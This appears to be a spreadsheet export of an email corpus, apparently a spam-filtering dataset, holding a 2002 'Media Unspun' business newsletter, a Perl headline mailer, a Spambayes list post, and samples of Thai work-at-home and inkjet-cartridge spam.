 Hewlett-Packard and EMC Sue Each Other (Reuters)
 http://www.nytimes.com/reuters/technology/tech-tech-hewlett-emc.html
 Dealing With W
 http://www.nytimes.com/2002/10/01/opinion/01KRUG.html
 Broadband Disconnect
 http://www.washingtonpost.com/wp-dyn/articles/A21649-2002Sep30.html
 Judge Dismisses $800M Cell Phone-Brain Tumor Suit (AP)
 http://www.washingtonpost.com/wp-dyn/articles/A22712-2002Sep30.html
 Microsoft Puts Meat Behind Security Push
 http://www.eweek.com/article2/0,3959,561985,00.asp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Marketing: Cowpoke Productions (cowpokeproductions.com).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http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@example.com
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@example.com
 ------------=_1033478774-12610-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;title&gt;Media Unspun&lt;/title&gt;
 &lt;!--  
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 To receive future messages in plain text format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Ctxt
 **********************************************************
 CREATED: October 1, 2002 
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="all"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;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.a274101923384032-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a274101923384032-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923384032-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a274101923384032-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923384032-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923384032-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923384032-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923384032-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a274101923384032-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923384032-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a274101923384032-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a274101923383480-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a274101923383480-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a274101923383480-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a274101923382079-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a274101923382079-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a274101923382079-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a274101923387038-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a274101923387038-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923387038-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a274101923387038-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923387038-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923387038-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923387038-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923387038-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a274101923387038-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923387038-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a274101923387038-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}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000021074.cfm&amp;XXDESXXissue_id=21074&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a274101923384032-footer_tellafriend"&gt;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src="http://a298.g.akamai.net/7/298/5382/100102092338/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="Media Unspun"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Tuesday, October 1, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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HREF="#a97667"
 						class="a274101923383480-contents_article_title"
 				&gt;
 			Market Can't Find Its Bottom With Both Hands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HREF="#a97668"
 						class="a274101923382079-contents_article_title"
 				&gt;
 			Winnick: Hands-Off or Red-Handed?
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a97669"
 						class="a274101923382079-contents_article_title"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Editor's Note
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more successful we are, the more useful we can be to you. Pass it on!&lt;/P&gt;&lt;P&gt;
 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&lt;P&gt;Pop!Tech 2002&lt;br&gt;
 October 18 - 20, 2002: Camden, Maine&lt;br&gt;
 Join 500 big thinkers to discuss&lt;br&gt;
 the collision of technology and culture&lt;br&gt;
 Register now at: &lt;A HREF="http://www.poptech.org"&gt;http://www.poptech.org&lt;/A&gt; &lt;br&gt;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name="a97667"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Market Can't Find Its Bottom With Both Hands
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Remember when Nasdaq 2500 seemed impossibly low? Welcome back to cruel reality. These days, with few analysts willing to call a market bottom, financial reporters outdo each other with dire assessments of how bad things are and how much worse they can get. Maybe Morrissey should do a concert on Wall Street; the self-pity can't get much worse.&lt;/P&gt;&lt;P&gt;
 The markets' closing numbers were the same in every city, but you wouldn't know it from the headlines. It was the Dow's worst monthly performance in four years, said MSNBC. "3rd quarter worst for stocks since '87," read the Denver Post, repeating a popular figure reached by tallying the Dow and S&amp;P's percentage losses. The New York Daily News counted percentage losses for the month only and declared it the worst September since 1937. Everyone predicted a lousy September 2002, so the phrase
 "self-fulfilling prophecy" does spring to mind. &lt;/P&gt;&lt;P&gt;
 So does the phrase "gloom and doom." "Every day for the last three months, the market has erased $73 of wealth, including Saturdays, Sundays and holidays, for every person living in the United States," said the San Jose Mercury News. "Countless investors are starting to wonder if stocks will ever go up again," wrote USA Today. In a more plausible statement, TheStreet.com's Aaron Task said recent declines "demonstrated once again the folly of investors' repeated attempts to pinpoint a bottom"
 and "disabuse(d) them of the idea that the best time to buy is when things look worst, if only because recent history has shown stocks can go from terrible to awful and beyond." &lt;/P&gt;&lt;P&gt;
 OK, breathe. Go read the comics or something. Feeling better? Good, because there's more.&lt;/P&gt;&lt;P&gt;
 The New York Post, in small enough words for everyone to understand, made the public service announcement "Beware! October Is A Very Bad Month For The Stock Market." And you shouldn't take candy from strangers, either. The Post's John Crudele, a market curmudgeon before it was in style, warned, "This market is very dangerous, even if things look like they couldn't get any worse." Detroit Free Press columnist Susan Tompor agreed that "the next round of statements could indeed look pretty nasty." 
 &lt;/P&gt;&lt;P&gt;
 We have to agree: the stock market is bad. The economy is bad. It's going to get worse before it gets better, and that may take a while. The "bottom" is, technically, zero. Be cautious, yes, but don't let the media's bipolar disorder ruin your day. Just like dot-coms weren't really a new economy, a bear market isn't the end of the world. - Jen Muehlbauer&lt;/P&gt;&lt;P&gt;
 No Happy Endings in September &lt;br&gt;
 &lt;A HREF="http://www.thestreet.com/markets/aarontaskfree/10045171.html"&gt;http://www.thestreet.com/markets/aarontaskfree/10045171.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bear drags stocks deeply into den&lt;br&gt;
 &lt;A HREF="http://www.usatoday.com/money/markets/us/2002-09-30-bear-bottom_x.htm"&gt;http://www.usatoday.com/money/markets/us/2002-09-30-bear-bottom_x.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Market's September is worst since 1937 &lt;br&gt;
 &lt;A HREF="http://www.nydailynews.com/business/story/23183p-21985c.html"&gt;http://www.nydailynews.com/business/story/23183p-21985c.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Dow posts worst month in 4 years&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/534548.asp"&gt;http://www.msnbc.com/news/534548.asp&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Market's Worst Quarter Since '87 Crash Limps to a Close&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/01/business/01STOX.html"&gt;http://www.nytimes.com/2002/10/01/business/01STOX.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 For Dow and S&amp;P, Worst Quarter Since '87 &lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A24961-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A24961-2002Sep30.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 3rd quarter worst for stocks since '87 (Denver Post)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1q3i"&gt;http://tinyurl.com/1q3i&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Market's tumble persists, capping worst three months in 15 years&lt;br&gt;
 &lt;A HREF="http://www.siliconvalley.com/mld/siliconvalley/4186771.htm"&gt;http://www.siliconvalley.com/mld/siliconvalley/4186771.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Stock Market Quarterly Review&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/page/0,,2_0861,00.html"&gt;http://online.wsj.com/page/0,,2_0861,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.)&lt;/P&gt;&lt;P&gt;
 Beware! October Is A Very Bad Month For The Stock Market &lt;br&gt;
 &lt;A HREF="http://www.nypost.com/business/58389.htm"&gt;http://www.nypost.com/business/58389.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 SUSAN TOMPOR: Bad news is, the beating isn't over yet &lt;br&gt;
 &lt;A HREF="http://www.freep.com/money/business/tompor1_20021001.htm"&gt;http://www.freep.com/money/business/tompor1_20021001.htm&lt;/A&gt; &lt;br&gt;
 &lt;/P&gt;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&lt;P&gt;What's Really Going on at Microsoft? Mary Jo Foley delivers unmatched reporting and insight with MICROSOFT WATCH.  Track initiatives like .Net, Palladium, Longhorn, Trinity, Yukon; release dates, competitive moves, people. For a FREE 14-day trial subscription:&lt;br&gt;
 &lt;A HREF="https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075"&gt;https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075&lt;/A&gt; &lt;/P&gt;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name="a97668"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Winnick: Hands-Off or Red-Handed?
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Former Global Crossing chairman Gary Winnick will appear before a Congressional committee today. It won't be pretty. CNN predicted he will plead the Fifth. Most other outlets expected Winnick to testify.&lt;/P&gt;&lt;P&gt;
 Impetus for all the coverage was yesterday's release by the House Energy and Commerce Committee of memos indicating that Winnick was in the thick of the company's suspect dealmaking. A committee spokesman said, "If he tries to portray himself as an out-of-the-loop ceremonial chairman, we intend to remind him that he is under oath."&lt;/P&gt;&lt;P&gt;
 The memo that got most of the attention was one from then-CEO Leo Hindery to Winnick in June 2001. Hindery warned in colorful language that the company was heading for a fall. The Financial Times, Washington Post, and New York Times all ran a quote from the memo comparing telcos to salmon. Hindery urged Winnick to unload the company -- "without looking like we are shaking our bootie all over the world," quoted the two Timeses -- and resigned shortly thereafter.&lt;/P&gt;&lt;P&gt;
 One little detail from the memos is guaranteed to make Winnick's time under the television lights even more uncomfortable. Among the companies he used his influence with, to help close deals, was Enron. All the reports mentioned Enron, but the New York Times seemed to be alone in noting that Global Crossing never completed a deal with the fallen energy giant.&lt;/P&gt;&lt;P&gt;
 The Wall Street Journal looked beyond the obviously embarrassing details of the memos to point out that, despite such evidence, the gun might not be smoking yet. "Prosecutors would still need to prove that he knew the transactions were improper and used them mainly as a way of enriching himself by boosting the company's stock price artificially," the Journal reporters wrote. The AP noted that all of the memos were dated after Winnick's last sale of Global Crossing stock, $123 million in May
 2001.&lt;/P&gt;&lt;P&gt;
 Despite his $734 million in stock profits, Gary Winnick was not among the five telco executives being sued by New York attorney general Eliot Spitzer to return their ill-gotten gains. Is Spitzer betting, with the Journal, that Winnick might walk away clean? - Keith Dawson&lt;/P&gt;&lt;P&gt;
 Global Crossing: What Did Winnick Know?&lt;br&gt;
 &lt;A HREF="http://www.cnn.com/2002/ALLPOLITICS/09/30/time.crossing.tm/"&gt;http://www.cnn.com/2002/ALLPOLITICS/09/30/time.crossing.tm/&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Winnick Was Told Of Telecom Risks&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A24886-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A24886-2002Sep30.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Memo Indicates Global Crossing Chief Knew of Troubles&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/01/business/01GLOB.html"&gt;http://www.nytimes.com/2002/10/01/business/01GLOB.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Global Crossing's Winnick Knew About Swap Deals&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1033426396710785953,00.html"&gt;http://online.wsj.com/article/0,,SB1033426396710785953,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required)&lt;/P&gt;&lt;P&gt;
 Documents show active role by Global Crossing chairman (AP)&lt;br&gt;
 &lt;A HREF="http://www.bayarea.com/mld/mercurynews/business/4187381.htm"&gt;http://www.bayarea.com/mld/mercurynews/business/4187381.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Suit Seeks IPO Profits From Five Executives&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A24921-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A24921-2002Sep30.html&lt;/A&gt; &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a97669"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Fund giant Fidelity set to eliminate 1,695 jobs (Boston Globe)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1q3h"&gt;http://tinyurl.com/1q3h&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 AOL Chairman's No. 1 Ally Turns Into His Biggest Foe&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/01/technology/01AOL.html"&gt;http://www.nytimes.com/2002/10/01/technology/01AOL.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 More living without benefits: Health insurance given less frequently at work  &lt;br&gt;
 &lt;A HREF="http://www.freep.com/money/business/insure30_20020930.htm"&gt;http://www.freep.com/money/business/insure30_20020930.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Beware al-Qaida, Branch is on to you (Battle Creek Enquirer)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1prs"&gt;http://tinyurl.com/1prs&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Hewlett-Packard and EMC Sue Each Other (Reuters)&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/reuters/technology/tech-tech-hewlett-emc.html"&gt;http://www.nytimes.com/reuters/technology/tech-tech-hewlett-emc.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Dealing With W&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/01/opinion/01KRUG.html"&gt;http://www.nytimes.com/2002/10/01/opinion/01KRUG.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Broadband Disconnect&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A21649-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A21649-2002Sep30.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Judge Dismisses $800M Cell Phone-Brain Tumor Suit (AP)&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A22712-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A22712-2002Sep30.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Microsoft Puts Meat Behind Security Push&lt;br&gt;
 &lt;A HREF="http://www.eweek.com/article2/0,3959,561985,00.asp"&gt;http://www.eweek.com/article2/0,3959,561985,00.asp&lt;/A&gt; &lt;/P&gt;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Marketing: Cowpoke Productions (&lt;a href="http://www.cowpokeproductions.com"&gt;cowpokeproductions.com&lt;/a&gt;).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value="http://newsletter.mediaunspun.com/index000021074.cfm"&gt;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 &lt;font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&lt;!-- 3,4:article_view --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td
 bgcolor="#000000"&gt;
 	&lt;font face="arial" size="2" color="#FFFFFF"&gt;&lt;b&gt;
 		&lt;CENTER&gt;Advertisement&lt;/CENTER&gt;
 	&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 				&lt;a href="http://www.poptech.org"&gt;&lt;img src="http://a298.g.akamai.net/7/298/5382/100102092338/www.imakenews.com/mediaunspun/mediaunspun_e_a000089486.JPG" BORDER="0" alt="" hspace="5" vspace="1" align="top"&gt;&lt;/a&gt;
 				&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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000021074.cfm&amp;XXDESXXissue_id=21074&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a274101923387038-footer_tellafriend"&gt;
 			&lt;font size=4&gt;Tell a Friend...&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 4 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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zzz-unspun@example.com &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@example.com"&gt;Click here&lt;/a&gt; to be instantly removed from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@example.com%2Ctxt"&gt;Click here&lt;/a&gt; to receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@example.com"&gt;Click here&lt;/a&gt; to change your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E219036,5114587XXmediaunspunXX21074XXXXindex000021074.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1033478774-12610-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-08-07
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Underground Movies of My Talks?
     posted by pudge on Tuesday August 06, @06:23 (others)
     http://use.perl.org/article.pl?sid=02/08/05/1323232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</si>
  <si>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future business Ѻس!
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;
 &gt;蹵 ѺšáԨԹ絔 
 &gt;ǡѺ¹ŧ˭ 
 &gt;ѺٻẺͧҹ͹Ҥ ؤͧšᴹ ѹ 
 &gt;ҹ¹ŧ͹ҤҧԹͧسʹ 
 &gt; Ѻҹ价ѹ
 &gt;ö 8,000  50,000 ҷ/͹
 &gt;
 &gt;ѺѤ÷駼ͧ ѹ 2-3   ͧШ
 &gt;
 &gt;ԡ   http://www.zthefuture.com/advanced
 &gt;   http://www.thaiworkathome.com/advanced
 &gt;
 &gt;
 &gt;
 &gt;ҷҹͧâŢù CLICK 
 &gt;http://www.thaiworkathome.com/unsubscribe.php
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] deleting "duplicate" spam before training?  good idea or
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Because I get mail through several different email addresses, I frequently
 get duplicates (or triplicates or more-plicates) of various spam messages.
 In saving spam for later analysis I haven't always been careful to avoid
 saving such duplicates.
 I wrote a script some time ago to try an minimize the duplicates I see by
 calculating a loose checksum, but I still have some duplicates.  Should I
 delete the duplicates before training or not?  Would people be interested in
 the script?  I'd be happy to extricate it from my local modules and check it
 into CVS.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Friend, Save 75% on Printer Ink!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor=#FFFFFF link=blue vlink=blue class="Normal" lang=EN-US&gt;
 &lt;table border=0 cellpadding=0 width="100%" bgcolor=white&gt;
   &lt;tr&gt; 
     &lt;td class="Normal"&gt; &lt;div align=center&gt; 
         &lt;table border=0 cellspacing=1 cellpadding=0 width="70%"
    bgcolor=black&gt;
           &lt;tr&gt; 
             &lt;td class="Normal"&gt; &lt;table border=0 cellspacing=1 cellpadding=0
      width="100%"&gt;
                 &lt;tr&gt; 
                   &lt;td bgcolor=white class="Normal"&gt; &lt;p align=center style='text-align:center'&gt;&lt;font size=3
       face="Times New Roman"&gt;&lt;span style='font-size:12.0pt'&gt;&lt;a
       href="http://click.top-special-offers.com/cgi-bin/t.pl?id=10747:60763006"&gt;&lt;span
       style='text-decoration:none;text-underline:none'&gt;&lt;img
       src="http://64.90.178.99/adview.php?what=ink_logo_c1&amp;n=ink_logo_c1" width=678
       height=63 border=0 id="_x0000_i1025"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                   &lt;td bgcolor="#000099" class="Normal"&gt; &lt;p align=center style='text-align:center'&gt;&lt;font size=4 color=white
       face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:Arial;color:white'&gt;SAVE 
                       50%-75% OFF the prices you're currently paying for &lt;br&gt;
                       replacement inkjet cartridges by shopping at &lt;a
       href="http://click.top-special-offers.com/cgi-bin/t.pl?id=10748:60763006"&gt;&lt;b&gt;&lt;font
       color=white&gt;&lt;span style='color:white;font-weight:bold'&gt;inkjetvilla.com&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;. 
                       &lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
                     &lt;p align=center style='text-align:center'&gt;&lt;font size=4 color=white
       face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:Arial;color:white'&gt;We 
                       offer cartridges for Epson, Lexmark, HP, and Canon&lt;br&gt;
                       at the...&lt;b&gt;&lt;span style='font-weight:bold'&gt;LOWEST PRICES&lt;/span&gt;&lt;/b&gt; 
                       you'll find anywhere! &lt;br&gt;
                       &lt;br&gt;
                       &lt;/span&gt;&lt;/font&gt;&lt;a href="http://click.top-special-offers.com/cgi-bin/t.pl?id=10749:60763006"&gt;&lt;font
       size=4 color=red face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:
       Arial;color:red'&gt;Click here and Save! &lt;/span&gt;&lt;/font&gt;&lt;/a&gt;&lt;font
       color=black&gt;&lt;/font&gt;&lt;/p&gt;
                     &lt;div align=center&gt; 
                       &lt;table border=0 cellpadding=0 width="70%"&gt;
                         &lt;tr&gt; 
                           &lt;td width="11%" class="Normal"&gt;  &lt;/td&gt;
                           &lt;td width="89%" class="Normal"&gt; &lt;p&gt;&lt;b&gt;&lt;font size=4 color=white face=Arial&gt;&lt;span
         style='font-size:13.5pt;font-family:Arial;color:white;font-weight:bold'&gt;*&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;font
         size=4 color=white face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:
         Arial;color:white'&gt; 50-75% OFF all inkjet cartridges, toner ink,  
                               and        paper!&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt; 
                           &lt;td width="11%" class="Normal"&gt;  &lt;/td&gt;
                           &lt;td width="89%" class="Normal"&gt; &lt;p&gt;&lt;b&gt;&lt;font size=4 color=white face=Arial&gt;&lt;span
         style='font-size:13.5pt;font-family:Arial;color:white;font-weight:bold'&gt;*&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;font
         size=4 color=white face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:
         Arial;color:white'&gt; We GUARANTEE you will be 100% Satisfied or   &lt;/span&gt;&lt;/font&gt;  
                                  &lt;font size=4
         color=white face=Arial&gt;&lt;span style='font-size:13.5pt;font-family:Arial;
         color:white'&gt;YOUR Money Back!&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt; 
                           &lt;td width="11%" class="Normal"&gt;  &lt;/td&gt;
                           &lt;td width="89%" class="Normal"&gt; &lt;p&gt;&lt;b&gt;&lt;font size=4 color=white face=Arial&gt;&lt;span
